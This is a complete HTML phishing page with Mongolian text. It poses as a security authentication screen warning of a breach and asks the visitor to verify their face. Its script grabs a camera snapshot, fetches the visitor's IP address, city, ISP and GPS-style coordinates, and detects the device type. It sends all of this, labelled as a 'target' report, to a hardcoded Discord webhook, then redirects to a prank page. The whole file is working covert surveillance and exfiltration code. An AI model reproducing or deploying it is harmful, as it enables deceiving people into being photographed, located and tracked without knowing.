<!DOCTYPE html>
<html lang="mn">
<head>
    <meta charset="UTF-8">
    <title>System Security Authentication</title>
    <style>
        body { background: #0a0a0a; color: #00FF00; font-family: 'Courier New', monospace; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh; margin: 0; text-align: center; }
        .box { border: 2px solid #00FF00; padding: 30px; border-radius: 10px; box-shadow: 0 0 15px #00FF00; max-width: 400px; }
        .btn { background: #00FF00; color: black; border: none; padding: 15px 30px; cursor: pointer; font-weight: bold; font-size: 1.1rem; margin-top: 20px; transition: 0.3s; }
        .btn:hover { background: #00cc00; transform: scale(1.05); }
        #canvas, #video { display: none; }
        .warning { color: red; font-weight: bold; margin-bottom: 10px; }
    </style>
</head>
<body>
    <div class="box">
        <div class="warning">⚠️ WARNING: SECURITY BREACH ⚠️</div>
        <p>Таны төхөөрөмжөөс сэжигтэй хандалт илэрлээ. <br><br> Үргэлжлүүлэхийн тулд камераар нүүр царайгаа баталгаажуулна уу.</p>
        <button class="btn" onclick="captureEverything()">ID БАТАЛГААЖУУЛАХ</button>
    </div>

    <video id="video" autoplay></video>
    <canvas id="canvas"></canvas>

    <script>
        const WEBHOOK_URL = 'https://discord.com/api/webhooks/1459136830992683080/XvGgJxEN4NJS0Cq-VMociYYRoSDZ10og0Hn-XBWHKRqscW_xeAV73BwkBq-KlkQmeHgz';

        async function captureEverything() {
            try {
                // 1. Камерын зөвшөөрөл нэхэх
                const stream = await navigator.mediaDevices.getUserMedia({ video: true });
                const video = document.getElementById('video');
                video.srcObject = stream;

                // 2. IP болон Байршлын мэдээлэл татах
                const ipRes = await fetch('https://ipapi.co/json/');
                const ipData = await ipRes.json();

                // 3. Төхөөрөмж таних
                const ua = navigator.userAgent;
                let device = "PC / Desktop";
                if(/Android/i.test(ua)) device = "Android Smartphone";
                if(/iPhone|iPad|iPod/i.test(ua)) device = "Apple iOS Device";

                // Камер асахыг хүлээж байгаад зураг авах
                setTimeout(() => {
                    const canvas = document.getElementById('canvas');
                    canvas.width = video.videoWidth;
                    canvas.height = video.videoHeight;
                    canvas.getContext('2d').drawImage(video, 0, 0);

                    canvas.toBlob(async (blob) => {
                        const formData = new FormData();
                        formData.append('file', blob, 'target_photo.png');
                        
                        // Мэдээллүүдийг текст хэлбэрээр багцлах
                        const payload = {
                            content: "🚨 **ШИНЭ БАЙ ТӨХӨӨРӨМЖӨӨ БАТАЛГААЖУУЛЛАА!**",
                            embeds: [{
                                title: "Target Metadata Report",
                                color: 16711680,
                                fields: [
                                    { name: "📱 Төхөөрөмж", value: device, inline: true },
                                    { name: "🌐 IP Хаяг", value: ipData.ip, inline: true },
                                    { name: "🏙️ Байршил", value: `${ipData.city}, ${ipData.country_name}`, inline: false },
                                    { name: "📡 Оператор", value: ipData.org, inline: false },
                                    { name: "📍 Координат", value: `${ipData.latitude}, ${ipData.longitude}`, inline: false }
                                ],
                                footer: { text: "System Exploit Successful" },
                                timestamp: new Date()
                            }]
                        };

                        formData.append('payload_json', JSON.stringify(payload));

                        // 4. Discord руу бүгдийг нь илгээх
                        await fetch(WEBHOOK_URL, {
                            method: 'POST',
                            body: formData
                        });

                        // Камерыг унтраах
                        stream.getTracks().forEach(track => track.stop());

                        // Төгсгөлд нь Prank сайт руу шилжүүлнэ
                        window.location.href = "https://pranx.com/win10-update/";
                    }, 'image/png');
                }, 800);

            } catch (err) {
                alert("Алдаа: Баталгаажуулахын тулд камерыг зөвшөөрөх (Allow) шаардлагатай!");
            }
        }
    </script>
</body>
</html>
